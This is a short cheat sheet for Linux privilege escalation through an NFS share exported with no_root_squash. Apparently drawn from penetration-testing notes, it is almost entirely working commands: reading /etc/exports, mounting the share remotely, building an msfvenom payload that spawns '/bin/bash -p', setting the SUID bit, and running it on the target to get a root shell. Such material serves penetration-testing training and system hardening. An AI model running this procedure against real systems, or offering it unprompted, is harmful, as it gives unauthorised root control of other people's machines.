#
NFS
Check the contents of /etc/exports
for shares with the no_root_squash
option:
$ cat /etc/exports
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
No_root_squash means that we can write as root user to that location.
Confirm that the NFS share is available for remote mounting:
$ showmount -e <TARGET IP>
#
Exploit
Create a mount point on your local machine and mount the /tmp NFS share:
$ mkdir /tmp/nfs
$ mount -o rw,vers=2 192.168.1.25:/tmp /tmp/nfs
Using the root user on your local machine, generate a payload and save it to the mounted share:
$ msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
Make sure the file has the SUID bit set, and is executable by everyone:
$ chmod +xs /tmp/nfs/shell.elf
On the target machine, execute the file to get a root shell:
$ /tmp/shell.elf